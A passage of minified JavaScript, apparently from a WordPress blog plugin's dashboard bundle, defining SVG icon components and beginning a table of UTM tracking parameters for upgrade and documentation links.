2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),r.fs_comment_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,a.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,a.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,a.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),r.grid_col1=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-770 -381)"},(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),r.grid_col2=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-858 -381)"},(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),r.grid_col3=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,a.createElement)("g",{transform:"translate(-909 -381)"},(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),r.rocketPro=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,a.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),r.subtract=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightMark=(0,a.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),r.plus=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),r.delete=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),r.edit=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 .4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),r.duplicate=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),r.tabLongArrowRight=(0,a.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),r.saveLine=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.rightAngle=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),r.arrowRight=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.arrowLeft=(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.fiveStar=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),r.knowledgeBase=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.commentCount2=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.customerSupport=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),r.facebook=(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),r.typography=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,a.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.reload=(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),r.border=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),r.boxShadow=(0,a.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const o=r},2044:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});const a={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx